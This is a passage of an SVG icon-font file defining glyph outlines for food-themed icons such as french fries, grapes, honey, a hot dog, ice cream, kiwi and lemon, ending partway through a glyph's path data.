<glyph glyph-name="food-cart" horiz-adv-x="1000" unicode="&#xeb68;" d="M579 181c6 0 11 5 11 11 0 6-5 11-11 11-6 0-11-5-11-11 0-6 5-11 11-11z m-77 0c7 0 11 5 11 11 0 6-4 11-11 11-5 0-11-5-11-11 0-6 6-11 11-11z m119-31c6 0 11 5 11 11 0 6-5 10-11 10-6 0-11-4-11-10 0-6 5-11 11-11z m-77 0c7 0 11 5 11 11 0 6-4 10-11 10-5 0-11-4-11-10 0-6 6-11 11-11z m-160 0c6 0 11 5 11 11 0 6-5 10-11 10-6 0-11-4-11-10 0-6 5-11 11-11z m42 31c6 0 11 5 11 11 0 6-5 11-11 11-6 0-11-5-11-11 0-6 5-11 11-11z m34-31c7 0 11 5 11 11 0 6-4 10-11 10s-11-4-11-10c0-6 5-11 11-11z m424 638h-768c-16 0-29-13-29-29v-79c0-37 31-68 69-68 26 0 49 15 60 36 10 16 8 16 17 0 12-21 35-36 61-36s49 15 60 36c9 16 8 16 17 0 12-21 34-36 61-36s48 15 60 36c9 16 8 16 17 0 12-21 34-36 60-36s49 15 61 36c9 16 8 16 17 0 11-21 34-36 60-36s49 15 61 36c9 16 7 16 16 0 12-21 35-36 61-36 38 0 69 31 69 68v79c0 16-14 29-30 29z m12-817h-28v317c0 33-27 59-60 59h-3v247c-11 5-21 11-29 20-8-8-17-14-26-19v-248h-499v248c-10 5-19 11-26 19-8-9-18-15-29-20v-246h-4c-33 0-60-27-60-60v-291h0v-26h-28c-9 0-17-7-17-17v-24c0-10 8-17 17-17h792c10 0 18 7 18 17v24c0 9-8 17-18 17z m-504 253c27 21 65 31 108 31s82-10 109-31c30-22 45-55 45-94v0c0-2-2-4-4-4h-300c-2 0-4 1-4 4 0 39 16 72 46 94z m262-223c0-13-11-23-24-23h-259c-14 0-24 10-24 23v23c0 2 2 3 4 3h299c2 0 4-1 4-3v-23z m-3 38h-301c-13 0-23 11-23 25 0 14 10 25 23 25h301c12 0 22-11 22-25 0-14-10-25-22-25z m14 57h-330c-4 0-8 4-8 8s4 9 8 9h330c5 0 9-4 9-9s-4-8-9-8z" />
<glyph glyph-name="fork-and-knife" horiz-adv-x="1000" unicode="&#xeb69;" d="M689 788c-53 0-97-41-101-94l-27-376c-1-16 5-33 16-45s27-19 43-19h2l-9-294c-1-13 4-25 13-34 8-9 20-13 33-13h39c25 0 47 20 47 46v773c0 31-25 56-56 56z m-222-1h-4c-10 0-17-7-17-17v-165c0-15-12-27-27-27h-4c-15 0-27 12-27 27v166c0 9-7 16-17 16h-3c-10 0-17-7-17-16v-166c0-15-12-27-27-27h-4c-15 0-26 12-26 27v166c0 9-8 16-18 16h-3c-10 0-18-7-18-16v-251c0-31 26-55 56-55h8l-16-505c-1-13 4-25 13-34s21-13 33-13h37c13 0 25 4 34 13 9 9 13 21 13 34l-16 505h11c31 0 55 24 55 55v251c0 9-7 16-16 16z" />
<glyph glyph-name="french-fries" horiz-adv-x="1000" unicode="&#xeb6a;" d="M228 544h55c2 0 4-1 6-1l-11 103-45-7c-6-1-12-5-15-9-4-5-6-11-4-17l14-69z m107-24c8-8 14-18 16-30 5-34 24-64 51-85v320l-2 0c-1 0-2 0-2 0l-59-5c-6 0-12-3-17-8-4-4-6-10-5-16l18-176z m437 24l15 69c2 12-7 24-20 26l-45 7-11-103c2 0 4 1 6 1h55z m-123-54c2 12 8 22 16 30l18 176c2 12-9 23-22 24l-59 5-2 0-2 0v-320c28 21 47 51 51 85z m-95-108v384c0 12-11 22-25 22h-58c-14 0-25-10-25-22v-384c17-6 35-9 54-9 19 0 37 3 54 9z m-311-423h515l-4-27c-1-11-12-20-24-20h-459c-13 0-24 9-25 20l-3 27z m578 521l-61-502h-520l-61 502c-1 7 2 13 6 18 5 4 12 7 19 7h79c13 0 23-8 24-20 12-85 94-151 193-151 99 0 181 66 193 151 1 11 12 20 24 20h79c7 0 14-3 19-7 4-5 7-11 6-18z" />
<glyph glyph-name="fruits" horiz-adv-x="1000" unicode="&#xeb6b;" d="M467 483c10-12 20-23 33-32 10-6 20-8 31-5 6 2 11 3 16 6 30 14 54 35 73 61 16 20 26 42 27 68 0 12 0 24-4 35-7 18-21 28-38 34-18 8-37 12-57 14l-4 1c-21 2-41 4-62 1-23-4-40-15-48-38-10-24-11-49-4-74 8-26 21-50 37-71z m35-11c0 0-1 0-1 0-2 2-4 4-5 7 0 0 2 2 3 2 1 0 3-2 4-4 1-2 0-5-1-5z m38-6c-1 1-3 2-3 3 1 1 2 3 4 4 3 1 5 1 5 0 1 0 1-1 1-1-1-3-5-6-7-6z m85 114c1 1 2 1 2 0 1 0 1-1 1-1 0-4-1-9-2-13 0 0 0 0-1-1 0 0-1 0-2 1 0 0 0 0 0 1 0 1 0 2 0 3 0 2 0 5 0 6 1 1 1 2 2 3 0 1 0 1 0 1z m-10 42c0 1 1 3 3 3 1 0 2-1 3-2 2-2 3-4 3-7 1-2 0-5-1-7 0-1-1-1-1-1-2-1-4 1-5 2-3 3-3 8-2 12z m-7-80c1 1 3 1 3 1 1-1 1-1 1-2 0-1 0-3-1-6-2-3-3-5-6-7-1-1-3-1-3-1-1 1-2 3-1 4 1 4 3 8 7 11z m-12 43c2 2 5 2 6-1 0-1 0-2 1-4 0-2 0-6-1-8-1-1-1-2-2-3-2-3-5-3-6 0-2 4-1 13 2 16z m-14 48c2 2 5 2 7 0 2-3 2-6 3-9 0-2-1-6-1-8-1-1-1-2-2-3-2-2-4-2-7 0-3 5-3 15 0 20z m-2-131c-2-4-5-8-9-10-1 0-2 0-3 0 0 2 1 5 2 7s4 4 7 6c0 0 2 0 2-1 1 0 1-1 1-2z m-9 46c1 1 3 2 4 2 2-1 3-3 3-5 0-1 0-1 0-2 0-1 0-2 1-3s-1-2-2-4c-2-2-3-4-4-6-3-3-6-2-7 2-1 6 1 11 5 16z m-15 44c3 4 7 3 8-1 1-1 1-3 1-5 1-3 0-7-1-10-1-1-2-3-3-4-2-4-6-3-7 1-3 5-2 15 2 19z m-10-95c-1-2-3-3-4-2-2 0-3 2-3 3-1 1-1 2-1 3 0 2 1 5 2 7 1 1 1 2 2 3 2 2 6 1 7-2 1-5 0-9-3-12z m-6 142c3 3 6 3 7-2 1-1 1-3 1-4 1-3 0-7-1-10-1-1-2-3-3-4-2-3-5-3-7 1-2 5-1 14 3 19z m-12-85c3 3 6 3 8-1 0-1 0-3 0-4 1-3 0-7-1-9 0-2-1-3-2-4-2-3-5-3-7 1-2 4-1 13 2 17z m-5-71c2-1 4-4 3-8 0-2-1-4-2-5 0-1-2-2-3-2-1 0-2 1-2 3-1 0-1 1-1 2 0 2 0 5 1 7 1 2 3 3 4 3z m-14 111c1 2 2 3 3 5 2 3 5 2 7-1 3-6 2-16-2-20-3-3-6-3-8 0 0 2-1 4-1 6 0 3 0 7 1 10z m1-79c1-1 1-2 2-4 0-2 0-6-1-9-1-2-3-3-4-3-3 1-5 4-5 8 0 3 1 6 2 9 2 2 5 2 6-1z m-16 123c1 2 3 5 4 6 3 4 7 3 7-2 2-6 0-12-5-16-1-1-3-2-4-2-2 1-3 3-3 4 0 1 0 2 0 3 0 1-1 3-1 3 0 0 1 2 2 4z m-8-79c2 4 5 4 7 0 1-2 2-4 2-7 1-2 0-6-1-9-1-1-2-3-4-3-2-1-5 2-5 7 0 4 0 8 1 12z m-6-54c-1-1-1-1-3 0-3 3-5 8-5 12 0 3 2 3 3 2 3-2 4-4 5-7 1-2 1-6 0-7z m-6 97c2 2 4 2 5-1 1-1 1-3 1-4 1-2 0-6-1-8-1-1-1-2-2-4-2-2-4-1-6 1-2 4-1 13 3 16z m-11 42c1 1 4 2 5 2 1-1 1-2 2-3 0-2 0-5-2-7-1-2-3-4-5-5-2-3-5-1-5 2 0 5 2 8 5 11z m-11-80c0 0 1 0 1 1 1 0 2-1 3-2 3-4 4-8 4-13 0-1-1-3-2-3-1 0-2 1-3 2-2 2-3 5-4 8 0 3 0 6 1 7z m-5 40c0 1 1 2 2 2 0-1 1-2 1-2 1-1 1-2 1-4 0-1-1-4-2-6 0-1 0-2-1-3 0-1-1-2-2-2 0 0-1 1-1 2-1 5 0 9 2 13z m50 100c3-3 7-6 11-10 2-2 1-3-1-3-2 0-3 0-5-1-1 0-2 0-3-1-1-1-2-3 0-4 0-1 1-2 2-2 8-3 17-6 25-8 8-2 16-3 23-4 11-1 22-2 33-2 6-1 12 1 19 2 1 0 1 1 2 1 1 1 1 3 0 4-1 0-1 1-2 1-1 1-3 1-4 2-2 1-2 2 0 3 3 2 5 3 7 4 5 3 11 7 15 11 4 3 3 6-2 7-1 0-2 0-3 0-6-1-12-1-17-3-6-1-11-3-17-5-2 0-4 0-3 1 0 0 0 1 0 1 3 5 5 10 7 16 0 2 0 5-2 6-1 1-4 0-6-1-4-3-7-6-11-9-1-1-2-2-3-3-1-2-2-1-1 2 3 16 9 31 20 44 2 2 2 6-1 7-2 2-5 3-9 3-6 0-9-5-11-10-4-8-7-18-10-27-1-5-2-9-3-15 0-2-1-3-2 0-1 1-2 2-2 4-3 4-6 8-9 12-3 3-6 1-7-3 0-2-1-5 0-7 0-3 0-6 1-9 0-3-1-4-4-2-4 3-9 6-13 9-5 2-11 4-16 6-2 1-5 0-6-1-1-1 0-4 1-6 2-3 4-7 7-10z m-71-481c1-2 2-4 3-7 0-3 1-6 2-9h17c-1 6-3 11-4 16-1 2-1 5-1 7-1 2-1 5-2 7-2 14-3 28-2 42-11-10-25-17-40-20 10-8 18-17 24-29 1-2 2-5 3-7z m-12-9c-1 3-2 5-3 8-7 16-21 28-38 34-2 1-5 2-7 2l0-2c-1-5-3-11-5-16-6-13-15-24-27-33h82c-1 3-1 5-2 7z m37 118c0 0 0 0 0 1 1 2 0 4 0 6 0 2 1 4 1 6-2 19-11 35-25 46-12-11-28-18-45-20-3 0-5 0-8 0-9 0-18 1-26 4 0-14-3-27-10-39 13-11 23-27 27-45 1-3 2-7 2-11 0-2 0-4 0-6h1c2 0 4-1 7-1 5-1 10-1 16-1 23 2 42 16 53 35 1 5 2 10 4 15l1 2c0 3 1 5 2 8z m-180-124c0 0 1-1 2-1h26c27 6 48 27 53 53 0 1 0 3 1 4 0 1 0 2 0 3 0 2 0 3 0 5v2c0 2 0 3 0 5 0 0 0 1 0 1-2 18-11 33-23 44-3-3-5-6-8-8-2-2-4-4-6-5s-4-3-6-4c-10-7-22-11-35-12-3-1-5-1-8-1-2 0-4 1-6 1 0-2 1-4 1-5 2-25-7-48-23-65 9-8 20-14 32-17z m71 200c1-2 2-5 3-7 0-3 1-5 2-7 0-1 0-2 0-3 10-5 22-7 33-6 13 1 25 6 35 14 2 1 4 3 5 5 2 2 4 3 6 5 11 13 17 31 15 49-3 35-32 61-67 61-2 0-4 0-6 0-36-4-64-36-60-73 15-8 27-22 34-38z m-155-193c12 1 23 6 32 12 2 2 4 3 6 5 2 1 3 3 5 5 12 13 19 32 17 51 0 3-1 6-1 9-1 3-2 6-3 8-1 4-2 7-4 10-1 1-1 2-2 3-1 2-2 4-4 6-1 2-3 4-5 5-5 6-12 10-19 14-3 1-6 2-9 3-3 1-6 2-9 2-3 1-7 1-10 1-2 0-4 0-6 0-18-2-34-10-46-24-11-14-17-31-15-49 3-37 35-64 73-61z m-112 303c52-16 103-41 132-88 1-2 2-4 4-6 1-3 2-5 4-7-11-13-16-30-14-47 0-4 1-6 1-9 14-4 27-12 37-22 2-2 4-4 5-6 2-1 3-3 4-5 4-6 7-12 9-18 6-1 11-2 16-1 12 1 23 5 33 12 2 2 4 3 6 5 2 2 4 4 6 6l0 0c0 0 1 1 1 1 1 1 2 3 3 5 2 2 3 4 4 6 6 11 9 24 8 37v1c0 0 0 0 0 0 0 3-1 6-2 9l0 0c0 3-1 5-2 8-1 1-1 3-2 5-4 8-8 14-14 20-4 3-7 6-11 9-3 1-5 2-8 4-9 3-18 6-28 6-2 0-4 0-6-1-7 0-13-2-19-5l-4 6c-1 2-3 5-4 7-35 53-91 82-153 101-20 7-26-26-6-33z m97-61c-69 70-106-87-106-87 45-25 175 17 106 87z m749 166c-58-5-114-17-159-51-3-2-6-5-10-7-3-3-6-6-9-9-7 2-15 3-22 3-41 0-79-28-93-72-1-2-2-4-2-6-4-11-14-32-41-46-38-19-58-37-58-37l0 0c-22-17-41-40-53-66-1-2-2-4-2-7-1-2-2-4-3-6l-1-4c-8-24-9-50-5-75 0-2 0-5 1-7 0-2 1-5 1-7 2-6 4-12 6-18h370c7 30 6 61-4 90l0 0s-4 27-24 64c-15 30-10 55-7 64 1 2 1 3 2 4 1 3 2 7 2 10-19 13-34 29-40 48-3 11-5 30 10 49-1 1-2 2-3 3 3 2 6 4 9 6 3 3 6 5 9 7l5 2c2 1 3 3 4 3 11 7 21 12 31 13 27 10 56 15 85 17 22 2 24 37 1 35z m-77-65c-9 0-20-4-32-12-2-1-5-3-7-5-3-2-5-4-8-7-3-2-5-5-7-8-18-25-3-51 22-70 4-3 7-5 11-7 3-2 6-4 10-6 17-8 36-13 53-13 6 0 11 0 16 2 0 0-2 126-58 126z m-708-365c0-206 167-255 374-255 206 0 373 49 373 255h-747z" />
<glyph glyph-name="grapes" horiz-adv-x="1000" unicode="&#xeb6c;" d="M246 45c-52 0-98 30-122 74-19-22-30-51-30-82 0-69 53-125 119-125 45 0 85 27 105 67-20 18-35 42-42 70-10-2-20-4-30-4z m-110 101c1-4 3-8 4-11 20-40 60-67 106-67 9 0 18 1 26 3-1 6-1 12-1 17 0 18 3 35 9 51 1 4 2 7 4 11 2 3 3 7 5 10 8 16 20 30 33 41-60 3-110 45-128 103-40-20-67-63-67-112 0-12 2-24 5-35 1-4 2-8 4-11z m375-49c-54 0-101 33-125 80-4 9-8 19-11 29h0c-3-1-7-2-11-4-24-11-45-31-58-56-1-4-3-7-4-11-2-4-3-8-4-12-3-11-5-23-5-35 0-3 0-6 0-10 1-4 1-8 2-12 0-3 1-7 2-11 6-20 16-39 30-53 3-4 6-6 9-9 3-3 6-5 9-7 19-14 42-22 67-22 65 0 119 56 119 124 0 4 0 7-1 10-6 0-12-1-19-1z m-299 226c1-4 2-7 3-11 15-51 60-88 114-88 11 0 21 2 31 4 3 1 7 3 10 4l1 0c0 4-1 8-1 12 0 5 1 10 1 15 4 36 19 67 42 91-14 20-23 45-25 72-18-8-38-13-59-13-31 0-60 10-83 28-22-23-36-54-36-89 0-5 0-9 0-14 1-3 1-7 2-11z m341-44c0 4 0 7 1 11-9-2-17-2-26-2-23 0-45 6-65 16-3 2-6 4-9 6-4 2-7 4-10 7-6 4-12 9-17 15-21-23-35-54-35-88v-1c1-3 1-6 1-9l0-4c1-2 1-5 1-7l1-5c0-2 1-4 2-7 14-52 60-91 114-91 6 0 10 0 15 1 4 1 8 1 11 2s7 2 11 3c22 7 41 21 56 40-31 27-51 68-51 113z m-299 180c3-3 7-5 10-7 19-13 41-20 65-20 21 0 41 5 59 16 0 2 0 5 1 7 0 4 1 8 2 12 1 4 1 8 3 12 9 31 29 58 54 76v1c0 68-54 124-119 124s-119-56-119-124c0-35 14-67 36-89 3-3 5-6 8-8z m160 10c0-1-1-2-1-3-1-4-2-8-2-13-1-1-1-2-1-3 0-4 0-7-1-11 0-1 0-3 0-4v0c0-27 8-51 21-71 2-3 4-6 7-9 2-3 5-6 7-8 1-1 3-2 4-3 3-4 7-7 10-9 4-3 7-5 10-7 18-11 38-17 60-17 10 0 20 1 29 4 4 13 8 25 15 36 1 4 3 7 5 10 2 3 5 6 7 9 16 21 37 38 62 47 1 6 1 12 1 18 0 33-12 63-33 85 2 4 3 8 5 12 1 4 3 7 5 11 43 90 127 145 216 183 35 15 20 74-15 59-105-46-199-107-251-211-2-4-4-7-5-11-2-3-4-7-5-10-11 4-23 6-36 6-21 0-41-6-59-17-4-2-8-5-12-8-5-4-9-8-14-13-14-14-24-32-29-52z m280-66c-10 0-20-2-29-4-4-1-8-2-12-4-5-2-10-4-14-6-15-8-27-19-37-32-2-3-5-6-7-9-2-3-4-7-5-10-3-4-5-9-6-13-2-5-4-10-5-15-1-4-2-9-2-13-1-6-2-12-2-18 0-37 16-71 41-93 3-3 6-5 9-8 3-2 6-4 9-6 18-11 38-17 60-17 66 0 119 56 119 124s-53 124-119 124z m12 198c-108-139 124-195 200-141 0 0-91 279-200 141z" />
<glyph glyph-name="honey" horiz-adv-x="1000" unicode="&#xeb6d;" d="M857 389l-58 242c-2 11-12 18-24 18l-561 1c-11 0-21-8-23-19l-52-220c-2-8 0-17 6-23 6-5 13-8 22-7 0 0 8 1 20 3v-350c0-67 54-122 121-122h356c67 0 121 55 121 122v372c15-8 22-20 26-31l3-13c3-12 15-21 28-18 13 1 21 13 20 26 0 1-1 9-5 19z m-543-338l-56-18-44 39 11 57 56 19 44-39-11-58z m-12 116l12 58 56 18 44-39-12-57-56-19-44 39z m128-134l-52-17-41 36 11 54 52 17 41-37-11-53z m-5 114l11 54 52 17 41-36-11-54-52-17-41 36z m132-145l-56-19-44 39 12 58 56 19 44-39-12-58z m-13 123l12 58 55 19 45-39-12-58-56-19-44 39z m129-141l-52-18-41 37 11 53 52 18 41-37-11-53z m87 103l-52-18-41 36 11 54 52 17 41-36-11-53z m22 372c-8 2-16 3-25 3-38 0-77-20-114-40-21-11-40-21-56-26-8-3-16-4-26-4-39 0-79 19-80 19-3 2-7 3-10 3-4 0-8-1-11-3 0 0-30-14-61-14-16 0-30 4-40 11-25 19-64 28-117 28-17 0-34-1-48-3l39 168 523 0 35-145c-3 2-6 3-9 3z m-519 203h475c34 0 62 28 62 63s-28 63-62 63h-475c-35 0-63-29-63-63s28-63 63-63z" />
<glyph glyph-name="hot-dog" horiz-adv-x="1000" unicode="&#xeb6e;" d="M915 240l-759 365c-25 13-62-11-81-51-20-41-15-84 10-96l759-366c25-12 62 11 81 52 20 41 15 84-10 96z m-41-95c-3-5-7-9-11-11-4-2-9-2-13 0-26 12-33 32-39 48-5 14-9 24-24 31s-25 4-39-1c-16-5-36-12-62 1-25 12-33 32-39 48-5 13-8 23-23 30s-25 4-39 0c-16-5-36-12-62 0-26 13-33 33-39 48-5 14-9 24-24 31-15 7-25 4-39 0-16-6-36-12-62 0-25 12-33 32-39 48-5 14-8 24-23 31-10 5-18 5-26 3-4-1-9-2-13-4-16-5-36-12-62 1-26 12-33 32-39 48-5 13-9 23-24 31-8 4-11 15-6 25 4 10 15 14 23 10 26-12 33-32 39-48 5-13 9-23 24-30 15-8 25-4 39 0 16 6 36 12 62 0 5-3 9-5 12-8 16-12 22-27 27-40 5-14 9-24 24-31s25-4 39 1c16 5 36 11 61-1 26-12 33-32 39-48 5-14 9-24 24-31 15-7 25-4 39 1 16 5 36 12 62-1 26-12 33-32 39-48 5-13 9-23 24-30 15-8 25-4 39 0 16 5 36 12 61 0 26-13 33-33 39-48 5-14 9-24 24-31 9-4 11-16 7-25z m-683 489l725-348c4-2 9 0 11 5 19 49 3 101-38 121l-582 281c-41 19-92-1-119-46-3-5-1-11 3-13z m619-568l-724 349c-4 2-10 0-12-6-6-16-8-33-7-49 2-31 18-59 45-72l583-280c41-20 92 1 118 46 3 4 2 10-3 12z" />
<glyph glyph-name="ice-cream-alt" horiz-adv-x="1000" unicode="&#xeb6f;" d="M776 548c0 41-28 76-69 86-2 1-4 1-6 2l-6 1-4 0-1 4c-21 86-99 147-190 147-91 0-169-61-190-147l-1-4-4 0c-2-1-4-1-6-1-3-1-5-1-7-2-40-10-68-45-68-86 0-30 15-57 39-73l236-563 236 562c25 16 41 43 41 74z m-289 171c4 13 17 18 31 16 57-7 102-46 119-101 8-29-39-42-48-12-12 39-43 61-85 67-13 2-20 18-17 30z m-184-202c2 1 4 2 6 2 2 1 5 1 7 2 7 2 13 2 20 2h328c7 0 13 0 20-2 2 0 4-1 6-2 3 0 5-1 7-2 16-7 23-19 26-25 1-3 3-8 3-14h-13c-8 18-32 32-61 32h-306c-29 0-53-14-61-32h-11c0 6 2 11 3 14 3 6 10 18 26 25z m188-80l42-42-60-59-49 50 52 51 8 8 7-8z m-1 13l2 3h101l-17-16-37-37-36 37-13 13z m-30-13l-44-43-42 43-8 8 9 8h100l1-1-16-15z m-42-57l49-50-58-56-49 50 58 56z m56-57l47-48-58-57-47 48 58 57z m54-56l48-49-58-57-48 50 58 56z m-1 14l-47 47 60 59 47-48-60-58z m19 112l62 60 47-48-62-60-47 48z m-186 60l-1-1-1 1h2z m-60-4l-1 4h48l6-6-10-10-27-26-16 38z m48-113l-27 64 37 37 2 2 3-2 47-49-58-57-4 5z m8-21l47-47-19-19-28 66z m33-76l21 21 47-47-41-40-27 66z m57-138l-25 61 43 43 48-49-61-60-5 5z m9-20l48-49-19-19-29 68z m44-105l-11 26 22 22 7-6-18-42z m21 50l-4 4 10 9-6-13z m16 38l-27-27-50 51 61 60 36-37-20-47z m23 55l-33 35 58 56 9-10-34-81z m38 90l-7 7 17 17-10-24z m21 49l-36-34-48 49 60 59 38-40-14-34z m18 43l-36 36 62 61 10-11-36-86z m39 95l-7 8 18 18-11-26z m23 53l-1-2-37-36-25 26-16 16h81l-2-4z" />
<glyph glyph-name="ice-cream" horiz-adv-x="1000" unicode="&#xeb70;" d="M500 788c-113 0-206-93-206-206v-307c0-9 8-17 17-17h130v-287c0-32 26-59 59-59 32 0 59 27 59 59v287h129c9 0 17 8 17 17v307c0 113-92 206-205 206z m-115-211v-1l-39 5v0c7 50 52 142 168 138l5-40c-1 0-2 0-4 0-106 5-127-89-130-102z" />
<glyph glyph-name="juice" horiz-adv-x="1000" unicode="&#xeb71;" d="M337 742c9-4 13-13 13-13l28-73h0l49-129h22l-44 115h0l-37 95c-4 10-14 26-34 28-5 0-9 1-14 0-25-5-81-20-83-21l5-19c1 0 53 14 78 19 6 1 13 1 17-2z m390-185l2 3c20 22 31 51 33 81l0 3h-122l87-87z m-96-44l3 0c31 2 59 14 82 34l2 2-87 86 0-122z m-107 230l-2-2c-20-23-32-51-34-82l0-3h123l-87 87z m239-87l-1 3c-2 31-13 59-33 82l-2 2-87-87h123z m-47 98c-23 20-51 31-82 33l-3 1v-123l87 87c0 0-2 2-2 2z m-181 0l-3-2 87-87v123l-3-1c-30-2-58-13-81-33z m-211-824h282v-18h-282v18z m294 697v16h-204l6-15 182-1v-114h-275v114h53l-6 16h-63v-391s-5-60 40-94c11-8 29-19 36-25 24-21 43-33 42-79s-24-57-61-71c-37-13-44-23-44-40h281c0 17-6 27-43 40-37 14-61 25-62 71 0 46 18 58 42 79 8 6 26 17 37 25 45 34 39 94 39 94l0 375z" />
<glyph glyph-name="ketchup" horiz-adv-x="1000" unicode="&#xeb72;" d="M673 368c-1 66-2 131-3 197 0 12-4 15-16 15-13 1-28 3-42 4-3 13-7 26-9 39-1 10-6 14-16 14-17 1-34 2-51 3-7 46-15 91-21 135-1 10-6 13-15 13-9 0-13-4-14-13-6-43-12-87-18-132-10-1-18-2-27-3-13-1-30 2-38-5-8-7-7-24-9-36-2-10-5-16-17-16-11-1-22-5-34-6-8-1-13-3-16-7v0c-2-3-2-7-2-12 1-43 1-86 1-128 1-118 1-236 1-354v-24l1-63v0c2-21 14-34 32-45 5-3 10-5 15-7 49-23 101-26 153-24 43 1 86 8 125 28 11 5 18 12 22 22 0 135-1 270-2 405z m-257-348h-38v443h38v-443z" />
<glyph glyph-name="kiwi" horiz-adv-x="1000" unicode="&#xeb73;" d="M634 466c39-7 69 8 85 42-33 14-76-7-85-42z m-3-79c24-30 57-37 96-21-28 33-67 41-96 21z m21 232c-36-2-63-35-61-72 37 6 59 33 61 72z m-254-488c34 24 44 58 28 92-31-19-42-52-28-92z m170 161c15-46 42-67 74-62-9 41-36 64-74 62z m298 333c-69 121-188 178-322 155-237-40-435-233-475-470-22-124 10-232 121-308 143-98 297-106 457-60 128 38 200 122 254 251 24 56 37 113 37 180-4 91-28 174-72 252z m-18-153c-7-131-90-250-211-347-76-60-162-96-260-107-169-19-299 112-275 280 22 161 113 277 242 367 79 55 167 86 265 84 143-2 243-104 239-277z m-334 67c-86 2-184-88-192-173-6-71 36-116 108-115 81 2 171 79 185 160 13 78-26 127-101 128z m85-104c-5-81-91-164-172-165-59 0-92 38-84 98 10 78 97 153 176 152 50-2 82-35 80-85z m-104-192c-14-39-5-73 24-95 20 30 10 68-24 95z m-195 76c-30 16-69-1-90-39 37-10 70 6 90 39z m125 229c17 35 9 69-22 93-20-32-11-70 22-93z m-117-138c-21 31-55 39-94 22 26-32 62-40 94-22z m-28-232c39 6 67 43 57 77-38-14-59-42-57-77z m249 483c-29-26-36-57-30-96 37 19 49 58 30 96z m-178-182c-6 38-28 60-70 66 6-42 33-67 70-66z" />
<glyph glyph-name="layered-cake" horiz-adv-x="1000" unicode="&#xeb74;" d="M846 308h-18v95c0 52-41 95-91 95h-18v57c0 52-41 95-91 95h-3v28c0 30-23 55-52 55h-146c-29 0-52-25-52-55v-28h-3c-50 0-91-43-91-95v-57h-18c-50 0-91-43-91-95v-95h-18c-51 0-92-42-92-95v-227c0-11 9-19 19-19h838c10 0 18 8 18 19v227c1 53-40 95-91 95z m-450 357c0 0 1 0 2 0 8 0 15 6 15 13 0 3 2 5 5 5s5-2 5-5c0-7 7-13 15-13s16 6 16 13c0 3 2 5 5 5s5-2 5-5c0-7 7-13 15-13 8 0 15 6 15 13 0 3 3 5 5 5s5-2 5-5c0-7 7-13 16-13s15 6 15 13c0 3 2 5 5 5s5-2 5-5c0-7 7-13 15-13 9 0 16 6 16 13 0 3 2 5 5 5s5-2 5-5c0-7 7-13 15-13 1 0 2 0 3 0v-15h-209l1 15z m-78-110c0 31 24 57 54 57h256c30 0 54-26 54-57v-6c-1-1-3-2-6-2-4 0-8 3-8 8 0 13-13 23-27 23s-27-10-27-23c0-4-4-8-9-8-5 0-9 3-9 8 0 13-11 23-26 23-15 0-27-10-27-23 0-4-4-8-9-8s-9 3-9 8c0 13-12 23-26 23-15 0-27-10-27-23 0-4-4-8-9-8-5 0-9 3-9 8 0 13-12 23-26 23-15 0-27-10-27-23 0-4-4-8-9-8s-9 3-9 8c0 13-12 23-26 23-15 0-27-10-27-23 0-4-4-8-9-8-1 0-3 0-4 1v7h1z m0-23c1 0 2-1 4-1 14 0 26 11 26 24 0 4 4 8 9 8 5 0 9-4 9-8 0-13 12-24 27-24s26 11 26 24c0 4 4 8 9 8 5 0 9-4 9-8 0-13 12-24 27-24 14 0 26 11 26 24 0 4 4 8 9 8 5 0 9-4 9-8 0-13 12-24 27-24 14 0 26 11 26 24 0 4 5 8 9 8 5 0 9-4 9-8 0-13 12-24 27-24s27 11 27 24c0 4 4 8 8 8 5 0 9-4 9-8 0-13 12-24 27-24 2 0 4 1 6 1v-34h-365v34z m-110-181c6-3 13-5 20-5 22 0 41 17 41 38 0 7 6 13 14 13 7 0 13-6 13-13 0-21 19-38 42-38 22 0 41 17 41 38 0 7 6 13 13 13s14-6 14-13c0-21 19-38 41-38s42 17 42 38c0 7 6 13 13 13 8 0 14-6 14-13 0-21 19-38 41-38 23 0 42 17 42 38 0 7 6 13 13 13s14-6 14-13c0-21 19-38 41-38 23 0 42 17 42 38 0 7 6 13 13 13 8 0 14-6 14-13 0-21 19-38 41-38 5 0 10 1 15 3v-41h-584v43z m693-346h-802v61c6-3 13-4 21-4 31 0 57 25 57 57 0 10 8 19 19 19 10 0 19-9 19-19 0-32 25-57 57-57 31 0 57 25 57 57 0 10 8 19 19 19 10 0 19-9 19-19 0-32 25-57 57-57s57 25 57 57c0 10 8 19 19 19s19-9 19-19c0-32 26-57 57-57 31 0 57 25 57 57 0 10 9 19 19 19s19-9 19-19c0-32 26-57 57-57s57 25 57 57c0 10 9 19 19 19s19-9 19-19c0-32 26-57 57-57 8 0 15 1 22 4v-61h-1z m0 123c-1-3-2-6-2-9 0-11-9-19-19-19-11 0-19 8-19 19 0 31-26 56-57 56-32 0-58-25-58-56 0-11-8-19-19-19s-19 8-19 19c0 31-25 56-57 56-31 0-57-25-57-56 0-11-8-19-19-19-10 0-19 8-19 19 0 31-25 56-57 56-31 0-57-25-57-56 0-11-8-19-19-19-10 0-19 8-19 19 0 31-25 56-57 56-31 0-57-25-57-56 0-11-8-19-19-19-11 0-19 8-19 19 0 31-26 56-57 56-32 0-57-25-57-56 0-11-9-19-19-19s-19 8-19 19c0 2-1 5-2 7v87c0 32 25 57 55 57h693c30 0 54-25 54-57v-85h1v0z" />
<glyph glyph-name="lemon-alt" horiz-adv-x="1000" unicode="&#xeb75;" d="M935 393c-1 7-2 14-3 21-18 114-72 208-162 280-67 52-143 82-227 91l-9 1c-6 1-20 2-33 2s-33-2-44-3c-7-1-14-2-21-3-154-26-266-110-334-251-22-47-34-97-38-149 0-1 0-3 0-4-1-2-1-14-1-27s1-33 2-44c1-7 2-14 3-21 19-121 78-218 177-291 63-46 134-72 212-80 3-1 6-1 10-1 5-1 20-2 32-2 13 0 33 2 45 3 7 1 14 2 21 3 143 24 250 99 320 226 30 54 47 112 51 174 0 1 0 3 1 4 0 2 1 14 1 27 0 13-2 33-3 44z m-36-53c-6-228-194-394-408-390-201 6-359 154-386 341-6 39-4 104 4 143 40 189 210 322 405 315 225-8 392-193 385-409z m-440-31c-7 7-15 2-23-1-42-17-84-35-126-52-34-14-69-29-103-43-7-3-13-7-17-12-8-10-6-25-5-30 1-3 2-6 4-9 30-51 71-91 121-122 22-14 43-7 53 18 32 76 64 152 95 229 3 7 8 15 1 22z m26 114c3-6 6-15 15-15 9 1 12 9 15 15 32 77 63 154 95 230 1 3 2 6 3 8 1 5 2 20-6 30-5 6-12 10-19 12-11 3-22 5-32 6-48 8-96 6-142-6-24-6-34-26-25-48 32-77 64-154 96-232z m208 236c-24 15-46 8-57-19-31-75-63-150-94-226-3-7-8-15-1-23 7-7 16-2 23 